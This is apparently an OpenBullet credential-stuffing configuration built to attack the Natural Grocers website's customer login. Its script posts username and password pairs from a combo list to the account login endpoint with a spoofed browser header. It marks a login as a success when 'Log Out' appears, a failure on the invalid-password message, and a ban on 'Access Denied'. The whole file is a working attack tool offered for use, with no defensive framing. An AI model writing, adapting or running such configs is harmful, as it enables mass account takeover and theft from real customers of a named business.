[SETTINGS]
{
  "Name": "Naturalgrocers.com",
  "SuggestedBots": 1,
  "LastModified": "2018-09-24T09:30:15.5922258+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#post_cred REQUEST POST "https://www.naturalgrocers.com/my-account/" AutoRedirect=TRUE 
  CONTENT "user_email=<USER>&user_pass=<PASS>&primary_phone=&logmein=logmein" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://www.naturalgrocers.com/my-account/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Log Out" 
  KEYCHAIN Failure OR 
    KEY "Invalid email/phone or password" 
  KEYCHAIN Ban OR 
    KEY "Access Denied" 
